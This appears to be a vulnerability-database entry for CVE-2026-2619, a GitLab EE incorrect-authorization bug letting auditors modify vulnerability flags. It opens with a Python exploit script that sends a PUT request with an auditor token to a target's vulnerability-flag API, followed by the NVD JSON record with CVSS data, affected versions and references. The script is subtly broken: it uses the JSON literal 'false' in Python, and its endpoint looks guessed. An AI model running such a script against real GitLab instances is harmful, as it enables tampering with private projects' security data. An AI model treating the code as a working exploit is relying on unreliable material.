CVE-2026-2619

#!/usr/bin/env python3 import requests # Exploit Title: GitLab EE Auditor Privilege Escalation (CVE-2026-2619) # Description: Modifies vulnerability flag data using Auditor credentials. target_url = "https://gitlab-target.com/api/v4/projects/1/vulnerabilities/10/flag" access_token = "glpat-auditor-token-here" # Token for user with 'auditor' role headers = { "Authorization": f"Bearer {access_token}", "Content-Type": "application/json" } # Data payload to update the flag payload = { "comment": "Updated via exploit - auditor access", "resolved": false } try: # Send PUT request to modify vulnerability flag response = requests.put(target_url, headers=headers, json=payload) if response.status_code == 200: print("[+] Exploit successful! Vulnerability flag modified.") print(f"[+] Response: {response.text}") else: print(f"[-] Exploit failed. Status code: {response.status_code}") print(f"[-] Response: {response.text}") except Exception as e: print(f"[!] Error: {e}")

{"cve": {"id": "CVE-2026-2619", "sourceIdentifier": "[email protected]", "published": "2026-04-08T23:16:58.557", "lastModified": "2026-04-14T16:55:10.480", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "GitLab has remediated an issue in GitLab EE affecting all versions from 18.6 before 18.8.9, 18.9 before 18.9.5, and 18.10 before 18.10.3 that under certain circumstances could have allowed an authenticated user with auditor privileges to modify vulnerability flag data in private projects due to incorrect authorization."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.6.0", "versionEndExcluding": "18.8.9", "matchCriteriaId": "13D9228E-DCC9-4811-B395-8B36ED4F84BE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.9.0", "versionEndExcluding": "18.9.5", "matchCriteriaId": "3BA6A89D-D2C1-45B9-A8E8-64256816D880"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.10.0", "versionEndExcluding": "18.10.3", "matchCriteriaId": "BB2F3665-2451-4A4D-8538-93F540975F0E"}]}]}], "references": [{"url": "https://about.gitlab.com/releases/2026/04/08/patch-release-gitlab-18-10-3-released/", "source": "[email protected]", "tags": ["Vendor Advisory", "Release Notes"]}, {"url": "https://gitlab.com/gitlab-org/gitlab/-/work_items/590430", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://hackerone.com/reports/3554982", "source": "[email protected]", "tags": ["Permissions Required"]}]}}